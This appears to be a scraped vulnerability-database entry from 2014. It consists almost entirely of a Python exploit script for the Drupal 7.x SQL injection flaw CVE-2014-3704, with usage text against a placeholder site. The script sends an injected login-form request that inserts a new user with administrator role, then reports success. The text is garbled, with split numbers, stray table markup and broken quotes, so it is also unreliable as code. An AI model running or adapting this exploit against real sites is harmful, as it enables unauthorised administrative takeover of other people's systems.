Drupal 7. x SQL Injection exp (CVE-2 0 1 4-3 7 0 4)-vulnerability warning-the black bar safety net

2014-10-22T00:00:00
ID MYHACK58:62201454897
Type myhack58
Reporter 佚名
Modified 2014-10-22T00:00:00

Description

| 1 | import urllib2,sys ---|---

2 | from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py` ---|---

3 | if len(sys. argv) != 4: ---|---

4 | print""` ---|---

5 | print"python 7.xSQL.py <http://xxoo.com/drupal> admin 1 2 3 4 5 6"` ---|---

6 | print""` ---|---

7 | sys.exit(1)` ---|---

8 | host = sys. argv[1] ---|---

9 | user = sys. argv[2] ---|---

1 0 | password = sys. argv[3] ---|---

1 1 | hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqhaf82wlbhpt2k5tzkzml", password). get_hash() ---|---

1 2 | target ='%s/? q=node&destination=node" % host ---|---

1 3 | insert_user ="name[0%2 0;set+@a%3d%28SELECT+MAX%28uid%2 9+FROM+users%2 9%2b1;INSERT+INTO+users+set+uid%3d@a,status%3d1,name%3d\'"\ ---|---

1 4 | +user ` ---|---

1 5 | +"'+,+pass+%3d+'" \ ---|---

1 6 | +hash[:5 5] ` ---|---

1 7 | +"';INSERT+INTO+users_roles+set+uid%3d@a,rid%3d3;;#%2 0% 2 0]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in" ---|---

1 8 | #printinsert_user` ---|---

1 9 | content = urllib2. urlopen(url=target, data=insert_user). read() ---|---

2 0 | if "mb_strlen() expects parameter 1" in content: ---|---

2 1 | print"Success!\ nLogin now with user:%s and pass:%s"% (user, password)` ---|---

下载 https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py put to the same directory.